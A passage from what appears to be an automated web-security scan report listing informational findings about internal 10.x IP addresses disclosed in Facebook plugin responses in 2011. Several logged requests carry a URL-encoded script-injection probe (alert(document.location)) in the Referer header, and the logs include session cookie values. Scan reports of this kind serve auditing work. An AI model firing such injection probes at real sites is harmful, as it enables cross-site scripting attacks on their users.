The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/10-things-we-want-from-missioni-x-target/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.31.49
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:40 GMT
Content-Length: 23488

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.101. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/10-things-we-want-from-missioni-x-target/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.14.48
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:56 GMT
Content-Length: 23487

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.102. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.4.35
X-Cnection: close
Date: Sat, 17 Sep 2011 16:49:55 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.103. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-life/2011/dear-freshman-love-the-undecided-major/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.36.64
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:39 GMT
Content-Length: 23483

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.104. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/back-to-black-fall-footwear-we-love/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.109.81
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:01 GMT
Content-Length: 23342

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.105. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/fashion-tips/2011/intern-files-advice-at-alexander-wang-unexpected-rewards-at-miyake-and-opening-ceremony/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.210.53
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:56 GMT
Content-Length: 23410

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.106. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FUPROXX%2F116548701336&layout=standard&show_faces=false&width=690&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.104
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:17 GMT
Content-Length: 25700

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.107. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.181.121
X-Cnection: close
Date: Sat, 17 Sep 2011 17:12:45 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.108. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/sneaker-freak-and-proud-of-it/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.4.42
X-Cnection: close
Date: Sat, 17 Sep 2011 16:32:47 GMT
Content-Length: 23338

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.109. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.localedge.com&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.52.35
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:11 GMT
Content-Length: 23331

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.110. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd8b0611c%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fmusic%2F2011%2F09%2Ffrank-oceans-video-for-swim-good-is-well-so-good%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.108.106
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 26006

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.111. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/sneaker-freak-and-proud-of-it/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.12.56
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:38 GMT
Content-Length: 23477

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.112. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.104
X-Cnection: close
Date: Sat, 17 Sep 2011 17:18:08 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.113. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/have-a-very-mod-tastic-fall/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.197.67
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:01 GMT
Content-Length: 23334

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.114. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.100.53
X-Cnection: close
Date: Sat, 17 Sep 2011 17:07:21 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.115. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.146.109
X-Cnection: close
Date: Sat, 17 Sep 2011 17:23:35 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.116. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6bbbbf3%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fwebculture%2F2011%2F09%2Fthe-10-best-insta-tributes-to-the-always-sunny-season-7-premiere%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.71.130
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:22 GMT
Content-Length: 26058

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.117. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.17.124
X-Cnection: close
Date: Sat, 17 Sep 2011 16:43:08 GMT
Content-Length: 13402

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.118. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

